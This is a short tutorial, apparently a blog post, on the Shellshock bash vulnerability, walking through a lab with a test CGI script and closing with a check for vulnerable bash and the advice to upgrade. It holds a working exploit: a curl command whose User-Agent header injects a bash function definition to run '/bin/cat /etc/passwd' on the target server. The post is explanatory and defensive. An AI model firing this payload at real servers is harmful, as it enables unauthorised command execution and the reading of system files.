What is Shellshock vulnerability

In This Article

  • This article is about what is the security vulnerability known as shellshock.
  • How an exploit can happen

What is ShellShock vulnerability

ShellShock is a the vulnerability in bash, a most commonly used shell (command line interpreter) programmer in Linux. An exploit of this vulnerability is possible by arbitrary code execution (ACE). Any service in a target system which is pass the arguments from client machine to a bash to process (ex; bash cgi script) could be vulnerable.

A sample exploit

Lets see a sample case of ShellShock exploit

on machine A with bash (currently my bash version is 4.2.39(1) ) and apache server installed (and running)

create file: /var/www/cgi-bin/test.cgi with following content

echo “Content-type: text/plain”
echo “Sample bash CGI script “

and run following commands as root user for providing required permissions to the cgi script

[user@localhost ~]$ chown apache.apache test.cgi


[user@localhost ~]$ chmod u+x test.cgi

now from machine B (another Linux box) access http://<machine A ip address>/cgi-bin/test.cgi using a browser and you will see the line “Sample bash CGI script”

now lets try to see the same in command line (shell) on machine B.

[user@localhost ~]$ curl http://<machine A ip address>/cgi-bin/test.cgi

You will see the same “Sample bash CGI script” as the output.

Now, to see the /etc/passwd file which provides all users information in target machine you just have to do the following

[user@localhost ~]$ curl -H “User-Agent:() { :; }; echo;/bin/cat /etc/passwd” http://<machine A ip address>t/cgi-bin/test.cgi


What is happening here

When we request a web page, the requesting program (ex: browser) passes URL, the parameters and some header information such as browser name, http version, method (GET/POST) etc. When these parameters are passed from http server to a bash shell program, it parses these argument and the vulnerability makes the arbitrary command part to be get executed in target machine.


The solution for shellshock is to upgrade to a bash version where this is fixed. To check if your bash is having this vulnerability, use the following command

[user@localhost ~]$ env tst='() { :;}; echo Vulnerable’ bash -c :

If the above command outputs ‘Vulnerable’, your shell program is vulnerable to shellshock attack. If this quits quietly, the installed bash shell is safe.


Leave a Reply to Soorej P Cancel reply

Your email address will not be published. Required fields are marked *

six + 3 =